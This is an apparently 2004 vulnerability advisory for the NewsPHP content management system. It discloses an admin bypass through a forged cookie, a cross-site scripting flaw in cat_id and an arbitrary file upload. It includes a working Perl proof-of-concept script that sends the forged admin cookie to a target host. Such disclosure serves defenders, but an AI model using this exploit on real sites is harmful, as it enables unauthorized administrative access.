#Title: XSS, Admin Access via Cookie and File Upload vulnerability in NewsPHP.

#Software: NewsPHP (All versions)
#Vendor: http://www.newsphp.com
#Underlying OS: All


#Description: 

NewsPHP is a perfect solution for creating web publishing system, like an online magazine, newspaper, TV/Radio or news portals. It works also as a Content Management System that is easy to install and manage without having to FTP upload your pages every time you need to update it.


#Vulnerabilities:

A security vulnerability in the product allows attackers to cause the product to think they are administrators by placing a fake Administrator cookie on their computer.

A File Upload vulnerability in the Admin panel allow authenticated users upload arbitrary files instead of a video file.

This product also is vulnerable to the Cross-Site Scripting vulnerability.


#Cookie Vulnerability#

The flaw is caused because cookie data is not properly checked for administrator rights.

This is the cookie and POC to gain administrator privileges in newsPHP:

### autorized=admin; root=admin ###


## PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP) ##------------

#!/usr/bin/perl -w
## Example: POCnws.pl www.vulnerweb.com newsadmin POCnws.htm

use IO::Socket;
if (@ARGV < 3)
{
print "\n\n";
print "PROOF OF CONCEPT (Admin Access via Cookie in NewsPHP)\n\n";
print "Usage: POCnws.pl [host] [directory] [file.htm]\n\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$fichero = $ARGV[2];

print "\n";
print "----- Conecting .. <====\n\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conected\n";
print "====> Sending Data .. \n";
$socket->print(<<fin) or die "write: $!";
GET http://$host/$directorio/ HTTP/1.1
Cookie: autorized=admin; root=admin

fin
print "====> OK\n";
print "====> Generating $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

##--------------------------

#Cross-Site Scripting#

A remote user can conduct cross-site scripting attacks due to an input validation flaw in cat_id variable.

/index.php?cat_id=[XSS]


#File Upload vulnerability#

An user with privileges can upload executable code instead of a video in the Administration Panel. Once the code has been uploaded an user can execute the code by calling the file, this will be executed with the privileges of the web server.


#Solution:

There is no solution at the moment.
Vendor contacted Apr 3 2004